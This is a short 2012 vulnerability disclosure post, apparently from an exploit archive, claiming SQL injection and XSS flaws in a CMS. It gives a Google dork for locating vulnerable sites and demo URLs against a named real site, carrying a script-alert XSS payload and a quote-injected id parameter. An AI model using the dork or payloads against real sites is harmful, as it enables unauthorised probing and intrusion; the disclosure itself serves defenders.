todaysart Cms multiply vulnerability

2012-07-04 08:30:30
Inviato da: Crim3R

# Exploit Title: todaysart Cms multiply vulnerability

# Google Dork: intext:"Powered by TRUE"

# Date: 30/06/2012

# Author: Crim3R

# software Link : http://true.nl/

# Version: All

# Tested on: all



========================================

there is an sql inejection vulnerability in projects.php

also an xss vulnerability in search.php


========================================
Demo:

http://todaysart.nl/portal/search.php?s=<script>alert(0)</script>

http://todaysart.nl/portal/projects.php?id='210'


===============Crim3R=====================

sites :

http://irist.ir/forum/

http://security7.ir/sc/


thanks to : Amir - Skote_vahshat- 2MzRp - Mikili -

and all IrIsT security7 Members ...

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.